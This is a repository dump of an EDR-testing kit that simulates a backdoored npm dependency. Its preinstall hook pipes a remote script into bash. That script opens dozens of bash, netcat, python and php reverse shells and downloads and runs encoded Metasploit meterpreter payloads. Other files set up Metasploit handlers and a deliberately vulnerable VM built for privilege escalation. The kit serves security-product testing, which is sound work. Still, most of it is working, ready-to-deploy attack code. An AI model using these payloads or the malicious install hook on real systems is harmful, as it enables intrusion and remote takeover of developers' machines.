├── README.md ├── config ├── local ├── install_backdoored_npm.sh ├── package.json ├── package │ └── package.json ├── package_npm_archive.sh └── vulnerable_machine │ ├── Vagrantfile │ └── provision.sh ├── remote ├── all_the_backdoors.sh ├── all_the_handlers.rc └── handle_handlers.sh ├── setup_and_run_local.sh └── setup_and_run_remote.sh /README.md: -------------------------------------------------------------------------------- 1 | # Simple EDR test initial access scenario 2 | I don't want to publish detection results as I'm not convinced it is not helping the bad guys more and in any case if you bought a shiny an expensive product you should take it for a spin. With all this around it should be fairly easy. 3 | It is a reduced and also somewhat extended version of a test case we were using. Let me know or open a PR if something does not work 4 | 5 | ## Scenario 6 | - You are installing an npm package that has a dependency that got backdoored 7 | - In a malicious `preinstall` script it downloads and runs a script 8 | - That drops a bunch of backdoors 9 | - Adversary is obvious oldschool reverse shell and opensource tools like [Metasploit](https://github.com/rapid7/metasploit-framework) (and I recommend adding [Mythic](https://github.com/its-a-feature/Mythic), but I was too lazy to automate that) 10 | 11 | ## Why? 12 | Having realistic test cases for testing security tools is hard to come by 13 | - You don't want to waste time creating a complicated, realistic scenario but if you get detected it is unclear if this is because what you did was obvious or it would get detected in less obvious situations too (legit parent, staged loading etc) 14 | - If things don't you will get push back from providers - "Hey this is just your lab stuff in reality we would have detected it" 15 | - Created a bunch of different versions of reverse shells so you can check how robust the detection is 16 | 17 | ## Does NOT include anything new. Does not: 18 | - include exploits / use any vulnerability 19 | - have novel bypasses 20 | - include anything post exploitation 21 | 22 | ## Troubleshooting 23 | - Metasploit handlers will die every once in a while so only use 24 | 25 | ## Setup 26 | - You will need a test machine(s) where you will be dropping the backdoors (local) and C2 that it will be able to access (remote) 27 | local: you will need `curl`, `sed`, `bash` and of course `npm`. For some backdoors to work you will need `python`, `php`. Some of the getto reverse shells will fail because of shell syntax/capability/package difference but it should not break script execution. But really just use the vulnerable box for Linux 28 | remote: you will need Metapsloit (and `ruby` if this does not come with it) 29 | 30 | Super simple, but the internet will know your C2 IP: 31 | 1, fork the repo and set the C2 IP in the config file 32 | 2, clone your fork on the C2 and run `setup_and_run_remote.sh` 33 | 3, clone your fork on all your test machines and run `setup_and_run_local.sh` 34 | Alternatively you can just clone this one and remember to set all configs without making typos. 35 | 36 | ## Vulnerable box 37 | There is also a vulnerable Linux VM you can use for testing. Comes with: 38 | - `npm` installed to run the a backdoored package installation 39 | - kernel version that has a few privilege escalations that have metasploit modules 40 | - docker so you can privilege escalate like you would on any developer machine 41 | - it is in vagrant to help you snapshot/reset to states you might need in testing 42 | 43 | ## Frequently Answered Answers 44 | - This is just a lab scenario: [Nope](https://www.zdnet.com/article/malicious-npm-package-opens-backdoors-on-programmers-computers/) 45 | - Nobody uses these tools in reality, we do detect malware/miner etc better: [Yeah, naaah..](https://www.redscan.com/news/key-insights-from-the-conti-ransomware-playbook-leak-foothold/) 46 | - A reverse shell by itself is not malicious: I recommend you try all the post scripts in Metasploit but don't start with the exploits. You can also manually do some obvious authorized_keys or cron persistance. 47 | 48 | ## Things you could do to go deeper 49 | - adding [Mythic](https://github.com/its-a-feature/Mythic) is really worth it and you can work with a proper modern C2 framework 50 | - for macOS there is some pretty cool [JXA stuff](https://github.com/D00MFist/PersistentJXA) out there that works 51 | - in some cases EDRs do detect command patterns maybe you want to have other options than wget -> sh and wget -> chmod -> run 52 | - payloads are served from the same IP but I tried to make it easy for you to change that (does not make a difference though) 53 | -------------------------------------------------------------------------------- /config: -------------------------------------------------------------------------------- 1 | HANDLER_IP=whynot 2 | WEBSERVER_PORT=8000 3 | WEBSERVER_IP=$HANDLER_IP 4 | -------------------------------------------------------------------------------- /local/install_backdoored_npm.sh: -------------------------------------------------------------------------------- 1 | npm install 2 | # clean up so you can run them again 3 | rm -rf ./node_modules ./package-lock.json -------------------------------------------------------------------------------- /local/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "haxored", 3 | "dependencies": { 4 | "backdoors": "file:backdoors.tgz" 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /local/package/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "backdoors", 3 | "scripts": { 4 | "preinstall": "curl -s http://WEBSERVER_IP:WEBSERVER_PORT/all_the_backdoors.sh | bash" 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /local/package_npm_archive.sh: -------------------------------------------------------------------------------- 1 | tar -czvf backdoors.tgz package -------------------------------------------------------------------------------- /local/vulnerable_machine/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | # All Vagrant configuration is done below. The "2" in Vagrant.configure 5 | # configures the configuration version (we support older styles for 6 | # backwards compatibility). Please don't change it unless you know what 7 | # you're doing. 8 | Vagrant.configure("2") do |config| 9 | # The most common configuration options are documented and commented below. 10 | # For a complete reference, please see the online documentation at 11 | # https://docs.vagrantup.com. 12 | 13 | # Every Vagrant development environment requires a box. You can search for 14 | # boxes at https://vagrantcloud.com/search. 15 | config.vm.box = "bento/ubuntu-20.04" 16 | config.vm.box_version = "202105.25.0" 17 | # Disable automatic box update checking. If you disable this, then 18 | # boxes will only be checked for updates when the user runs 19 | # `vagrant box outdated`. This is not recommended. 20 | # config.vm.box_check_update = false 21 | 22 | # Create a forwarded port mapping which allows access to a specific port 23 | # within the machine from a port on the host machine. In the example below, 24 | # accessing "localhost:8080" will access port 80 on the guest machine. 25 | # NOTE: This will enable public access to the opened port 26 | # config.vm.network "forwarded_port", guest: 80, host: 8080 27 | 28 | # Create a forwarded port mapping which allows access to a specific port 29 | # within the machine from a port on the host machine and only allow access 30 | # via 127.0.0.1 to disable public access 31 | # config.vm.network "forwarded_port", guest: 80, host: 8080, host_ip: "127.0.0.1" 32 | 33 | # Create a private network, which allows host-only access to the machine 34 | # using a specific IP. 35 | # config.vm.network "private_network", ip: "192.168.33.10" 36 | 37 | # Create a public network, which generally matched to bridged network. 38 | # Bridged networks make the machine appear as another physical device on 39 | # your network. 40 | # config.vm.network "public_network" 41 | 42 | # Share an additional folder to the guest VM. The first argument is 43 | # the path on the host to the actual folder. The second argument is 44 | # the path on the guest to mount the folder. And the optional third 45 | # argument is a set of non-required options. 46 | config.vm.synced_folder "../../", "/vagrant_data" 47 | 48 | # Provider-specific configuration so you can fine-tune various 49 | # backing providers for Vagrant. These expose provider-specific options. 50 | # Example for VirtualBox: 51 | # 52 | # config.vm.provider "virtualbox" do |vb| 53 | # # Display the VirtualBox GUI when booting the machine 54 | # vb.gui = true 55 | # 56 | # # Customize the amount of memory on the VM: 57 | # vb.memory = "1024" 58 | # end 59 | # 60 | # View the documentation for the provider you are using for more 61 | # information on available options. 62 | 63 | # Enable provisioning with a shell script. Additional provisioners such as 64 | # Ansible, Chef, Docker, Puppet and Salt are also available. Please see the 65 | # documentation for more information about their specific syntax and use. 66 | # config.vm.provision "shell", inline: <<-SHELL 67 | config.vm.provision "shell", path: "provision.sh" 68 | # apt-get update 69 | # apt-get install -y apache2 70 | # SHELL 71 | config.trigger.after [:provision] do |t| 72 | t.name = "Reboot after provisioning" 73 | t.run = { :inline => "vagrant reload" } 74 | end 75 | end 76 | -------------------------------------------------------------------------------- /local/vulnerable_machine/provision.sh: -------------------------------------------------------------------------------- 1 | # Docker 2 | apt-get update && apt-get install -y apt-transport-https ca-certificates curl software-properties-common 3 | curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - 4 | add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu focal stable" && apt-get update 5 | apt-get install -y docker-ce npm git python2 php python 6 | # Right kernel version for privilege escalaiton 7 | apt-get install -y linux-image-5.8.0-48-generic 8 | apt-get -y purge 5.4.0-73-generic 9 | 10 | # Adding focker to make it possible to esclate to root 11 | groupadd docker 12 | usermod -aG docker vagrant 13 | newgrp docker 14 | -------------------------------------------------------------------------------- /remote/all_the_backdoors.sh: -------------------------------------------------------------------------------- 1 | #loaded with "preinstall": "wget -q -O - http://WEBSERVER_IP:WEBSERVER_PORT/all_the_backdoors.sh | bash" 2 | unameOut="$(uname -s)" 3 | case "${unameOut}" in 4 | Linux*) machine=Linux;; 5 | Darwin*) machine=Mac;; 6 | *) machine="UNKNOWN:${unameOut}" 7 | esac 8 | 9 | # Getto shells 10 | # Going to port 4242 11 | # use exploit/multi/handler 12 | # set payload linux/x86/shell/reverse_tcp 13 | # set lport 4242 14 | # set lhost 0.0.0.0 15 | # run -j -z --> but it is better to run it 1-by-1 16 | bash -i >& /dev/tcp/HANDLER_IP/4242 0>&1 17 | ncat -e /bin/sh HANDLER_IP 4242 18 | nc -c bash HANDLER_IP 4242 19 | netcat HANDLER_IP 4242 -e /bin/bash 20 | #netcat --udp HANDLER_IP 4242 -e /bin/bash & 21 | #bash -i >& /dev/udp/HANDLER_IP/4242 & 22 | export RHOST="HANDLER_IP";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' 23 | #awk 'BEGIN {s = "/inet/tcp/0/HANDLER_IP/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null & 24 | python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("HANDLER_IP",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 25 | python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("HANDLER_IP",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' 26 | python -c 'a=__import__;b=a("socket");p=a("subprocess").call;o=a("os").dup2;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("HANDLER_IP",4242));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])' 27 | python -c 'a=__import__;b=a("socket");c=a("subprocess").call;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("HANDLER_IP",4242));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())' 28 | python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("HANDLER_IP",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' 29 | python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("HANDLER_IP",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' 30 | python -c 'a=__import__;b=a("socket").socket;c=a("subprocess").call;s=b();s.connect(("HANDLER_IP",4242));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())' 31 | python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 32 | python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' 33 | python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")' 34 | php -r '$sock=fsockopen("HANDLER_IP",4242);exec("/bin/sh -i <&3 >&3 2>&3");' 35 | php -r '$sock=fsockopen("HANDLER_IP",4242);shell_exec("/bin/sh -i <&3 >&3 2>&3");' 36 | php -r '$sock=fsockopen("HANDLER_IP",4242);`/bin/sh -i <&3 >&3 2>&3`;' 37 | php -r '$sock=fsockopen("HANDLER_IP",4242);system("/bin/sh -i <&3 >&3 2>&3");' 38 | php -r '$sock=fsockopen("HANDLER_IP",4242);passthru("/bin/sh -i <&3 >&3 2>&3");' 39 | php -r '$sock=fsockopen("HANDLER_IP",4242);popen("/bin/sh -i <&3 >&3 2>&3", "r");' 40 | 41 | 42 | # ubuntu 43 | if [ "$machine" == "Linux" ]; then 44 | # unstaged going to port 4343 45 | # webserver at WEBSERVER_IP:WEBSERVER_PORT 46 | # use exploit/multi/handler 47 | # set payload linux/x64/meterpreter_reverse_tcp 48 | # set lport 4343 49 | # set lhost 0.0.0.0 50 | # run -j -z 51 | # msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=HANDLER_IP LPORT=4343 -e x86/shikata_ga_nai -i 19 -f elf > m_shi_iter.elf 52 | # msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=HANDLER_IP LPORT=4343 -e x86/shikata_ga_nai -f elf > m_shi.elf 53 | # msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=HANDLER_IP LPORT=4343 -f elf > m.elf 54 | wget http://WEBSERVER_IP:WEBSERVER_PORT/linux/m_shi_iter.elf -O m_shi_iter.elf && chmod +x ./m_shi_iter.elf && ./m_shi_iter.elf & rm ./m_shi_iter.elf 55 | wget http://WEBSERVER_IP:WEBSERVER_PORT/linux/m_shi.elf -O m_shi.elf && chmod +x ./m_shi.elf && ./m_shi.elf & rm ./m_shi.elf 56 | wget http://WEBSERVER_IP:WEBSERVER_PORT/linux/m.elf -O m.elf && chmod +x ./m.elf && ./m.elf & rm ./m.elf 57 | # This one is for reflective loading on linux with https://github.com/rek7/fireELF but I'm not automating this for now so you hafta create the payload and uncomment the line 58 | # python -c "import urllib2;exec(urllib2.urlopen('http://WEBSERVER_IP:WEBSERVER_PORT/linux/metr_loaded.py').read())" & 59 | 60 | # staged going to port 4444 61 | # webserver at WEBSERVER_IP:WEBSERVER_PORT 62 | # use exploit/multi/handler 63 | # set payload linux/x64/meterpreter/reverse_tcp 64 | # set lport 4444 65 | # set lhost 0.0.0.0 66 | # run -j -z 67 | # msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4444 -e x86/shikata_ga_nai -i 19 -f elf > m_staged_shi_iter.elf 68 | # msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4444 -e x86/shikata_ga_nai -f elf > m_staged_shi.elf 69 | # msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4444 -f elf > m_staged.elf 70 | wget http://HANDLER_IP:WEBSERVER_PORT/linux/m_staged_shi_iter.elf -O m_staged_shi_iter.elf && chmod +x ./m_staged_shi_iter.elf && ./m_staged_shi_iter.elf & rm ./m_staged_shi_iter.elf 71 | wget http://HANDLER_IP:WEBSERVER_PORT/linux/m_staged_shi.elf -O m_staged_shi.elf && chmod +x ./m_staged_shi.elf && ./m_staged_shi.elf & rm ./m_staged_shi.elf 72 | wget http://HANDLER_IP:WEBSERVER_PORT/linux/m_staged.elf -O m_staged.elf && chmod +x ./m_staged.elf && ./m_staged.elf & rm ./m_staged.elf 73 | 74 | # This one is for reflective loading on linux with https://github.com/rek7/fireELF but I'm not automating this for now so you hafta create the payload and uncomment the line 75 | # python -c "import urllib2;exec(urllib2.urlopen('http://HANDLER_IP:WEBSERVER_PORT/linux/metr_staged_loaded.py').read())" & 76 | 77 | # Mythic 78 | # it is a bit more complicated but worth playing around, you have to generate to implants yourself https://github.com/its-a-feature/Mythic 79 | #wget http://WEBSERVER_IP:WEBSERVER_PORT/linux/merlin.elf -O merlin.elf && chmod +x ./merlin.elf && ./merlin.elf & rm ./merlin.elf 80 | #wget http://WEBSERVER_IP:WEBSERVER_PORT/linux/merlin_obfuscated.elf -O merlin_obfuscated.elf && chmod +x ./merlin_obfuscated.elf && ./merlin_obfuscated.elf & rm ./merlin_obfuscated.elf 81 | #python2 -c "import urllib2;exec(urllib2.urlopen('http://WEBSERVER_IP:WEBSERVER_PORT/linux/medusa_linux.py').read())" & 82 | #python2 -c "import urllib2;exec(urllib2.urlopen('http://WEBSERVER_IP:WEBSERVER_PORT/linux/medusa_linux_obfuscated.py').read())" & 83 | fi 84 | 85 | # osx 86 | if [ "$machine" == "Mac" ]; then 87 | # meterpreter 88 | # use exploit/multi/handler 89 | # set payload python/meterpreter/reverse_tcp 90 | # set lport 4545 91 | # set lhost 0.0.0.0 92 | # run -j -z 93 | curl -s http://WEBSERVER_IP:WEBSERVER_PORT/macos/py_meter.py | python2 94 | 95 | # Mythic 96 | # it is a bit more complicated but worth playing around, you have to generate to implants yourself https://github.com/its-a-feature/Mythic 97 | # apfell 98 | #curl http://WEBSERVER_IP:WEBSERVER_PORT/macos/apfell_final.js | osascript -l JavaScript & 99 | # Medusa 100 | #python2 -c "import urllib2;exec(urllib2.urlopen('http://WEBSERVER_IP:WEBSERVER_PORT/linux/medusa_linux.py').read())" & 101 | #python2 -c "import urllib2;exec(urllib2.urlopen('http://WEBSERVER_IP:WEBSERVER_PORT/linux/medusa_linux_obfuscated.py').read())" & 102 | fi 103 | -------------------------------------------------------------------------------- /remote/all_the_handlers.rc: -------------------------------------------------------------------------------- 1 | # Getto shells going to port 4242 2 | use exploit/multi/handler 3 | set payload linux/x86/shell/reverse_tcp 4 | set lport 4242 5 | set lhost 0.0.0.0 6 | run -j -z 7 | # but it is better to run it 1-by-1 if you actually want to test 8 | 9 | # unstaged going to port 4343 10 | use exploit/multi/handler 11 | set payload linux/x64/meterpreter_reverse_tcp 12 | set lport 4343 13 | set lhost 0.0.0.0 14 | run -j -z 15 | 16 | # staged going to port 4444 17 | use exploit/multi/handler 18 | set payload linux/x64/meterpreter/reverse_tcp 19 | set lport 4444 20 | set lhost 0.0.0.0 21 | run -j -z 22 | 23 | # python on osx to 4545 24 | use exploit/multi/handler 25 | set payload python/meterpreter/reverse_tcp 26 | set lport 4545 27 | set lhost 0.0.0.0 28 | run -j -z -------------------------------------------------------------------------------- /remote/handle_handlers.sh: -------------------------------------------------------------------------------- 1 | echo "creating the payloads" 2 | mkdir linux macos 3 | cd linux 4 | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4444 -e x86/shikata_ga_nai -i 19 -f elf > linuxm_staged_shi_iter.elf 5 | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4444 -e x86/shikata_ga_nai -f elf > m_staged_shi.elf 6 | msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4444 -f elf > m_staged.elf 7 | 8 | msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=HANDLER_IP LPORT=4343 -e x86/shikata_ga_nai -i 19 -f elf > m_shi_iter.elf 9 | msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=HANDLER_IP LPORT=4343 -e x86/shikata_ga_nai -f elf > m_shi.elf 10 | msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=HANDLER_IP LPORT=4343 -f elf > m.elf 11 | 12 | cd ../macos 13 | msfvenom -p python/meterpreter/reverse_tcp LHOST=HANDLER_IP LPORT=4545 > py_meter.py 14 | 15 | echo "starting web server" 16 | ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => WEBSERVER_PORT, :DocumentRoot => Dir.pwd).start' & 17 | 18 | echo "starting MSF" 19 | msfconsole -r ./all_the_handlers.rc -------------------------------------------------------------------------------- /setup_and_run_local.sh: -------------------------------------------------------------------------------- 1 | CONFIG_FILE=./config 2 | if [ ! -f "$CONFIG_FILE" ]; then 3 | echo "Config file does not exists." 4 | exit 1 5 | fi 6 | source $CONFIG_FILE 7 | if [ "$HANDLER_IP" == "whynot" ]; then 8 | echo "you forgot to set the C2 IP please fix that in config" 9 | exit 1 10 | fi 11 | echo "$WEBSERVER_IP" 12 | echo "$WEBSERVER_PORT" 13 | curl --max-time 2 http://$WEBSERVER_IP:$WEBSERVER_PORT || { echo "The web server not started or accessible please ifgure out that first"; exit 1; } 14 | 15 | cd local 16 | 17 | echo "hardcoding web server port and ip" 18 | sed -i "s/WEBSERVER_IP/$WEBSERVER_IP/" ./package/package.json 19 | sed -i "s/WEBSERVER_PORT/$WEBSERVER_PORT/" ./package/package.json 20 | 21 | echo "packaging malicious dependency" 22 | ./package_npm_archive.sh 23 | 24 | echo "running npm install to trigger the backdoors" 25 | ./install_backdoored_npm.sh -------------------------------------------------------------------------------- /setup_and_run_remote.sh: -------------------------------------------------------------------------------- 1 | CONFIG_FILE=./config 2 | if [ ! -f "$CONFIG_FILE" ]; then 3 | echo "Config file does not exists." 4 | exit 1 5 | fi 6 | source $CONFIG_FILE 7 | if [ "$HANDLER_IP" == "whynot" ]; then 8 | echo "you forgot to set the C2 IP please fix that in config" 9 | exit 1 10 | fi 11 | cd remote 12 | echo "hardcoding web server port and ip and handler ip" 13 | sed -i "s/WEBSERVER_IP/$WEBSERVER_IP/" ./handle_handlers.sh 14 | sed -i "s/HANDLER_IP/$HANDLER_IP/" ./handle_handlers.sh 15 | sed -i "s/WEBSERVER_PORT/$WEBSERVER_PORT/" ./handle_handlers.sh 16 | sed -i "s/WEBSERVER_IP/$WEBSERVER_IP/" ./all_the_backdoors.sh 17 | sed -i "s/HANDLER_IP/$HANDLER_IP/" ./all_the_backdoors.sh 18 | sed -i "s/WEBSERVER_PORT/$WEBSERVER_PORT/" ./all_the_backdoors.sh 19 | echo "starting handlers" 20 | ./handle_handlers.sh 21 | --------------------------------------------------------------------------------